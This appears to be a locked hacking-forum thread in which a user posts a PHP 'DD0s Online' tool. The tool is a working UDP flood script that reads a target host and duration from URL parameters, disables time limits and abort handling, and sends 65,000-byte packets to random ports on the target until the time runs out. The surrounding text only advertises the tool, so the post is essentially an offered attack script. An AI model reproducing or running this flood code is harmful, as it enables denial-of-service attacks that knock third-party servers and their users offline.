Jump to content
YOUR-AD-HERE
HOSTING
TOOLS

Locked Black Sym Tool's V1.0 and ather Shell's


D4rkn3S

Recommended Posts

  
Your IP: <?php echo $ip; ?> (Don't Hit yourself)

<?php //UDP if(isset($_GET['host'])&&isset($_GET['time'])){ $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); //print "Started: ".time('d-m-y h:i:s')."
"; $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $packets++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "
UDP Flood
Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n"; echo '

Host:

Length (seconds):

'; }else{ echo '
UDP Flood
Host:

Length (seconds):


'; } ?>
Datang Tak DiUndang Pulang Dari Penggal MalingSIAL
Welcome To DD0s Online Girilaya Tool
Link to comment
Share on other sites

  • 11 months later...
Guest
This topic is now closed to further replies.
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.